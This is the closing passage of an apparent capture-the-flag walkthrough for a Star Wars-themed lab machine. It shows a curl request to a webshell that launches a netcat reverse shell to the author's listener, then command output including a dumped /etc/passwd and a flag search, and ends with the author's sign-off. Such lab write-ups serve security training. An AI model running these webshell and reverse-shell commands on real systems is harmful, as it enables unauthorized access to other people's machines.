[email protected]:~# curl -u '64base:[email protected]@reL00K1ing4' \
> -s 'http://172.16.0.19/Imperial-Class/BountyHunter/webshell.php?\
> cmd=nc.real%20172.16.0.3%201337%20-e%20/bin/bash' >/dev/null \
> & nc -nvlp 1337
[1] 2013
listening on [any] 1337 ...
connect to [172.16.0.3] from (UNKNOWN) [172.16.0.19] 39566

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
64base:x:1001:1001::/64base:/bin/rbash

find / -name flag5*
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}

From here you can obviously solve the rest of the challenge and get the last two flags as already described above. So there’s no need for me to repeat myself again here. ;D


If you’ve read this walkthrough all the way to the bottom then I salute you!

Again, drop me a comment on here or email me your thoughts.

I hope you enjoyed the challenge.

Thanks again,

ȜӎŗgͷͼȜ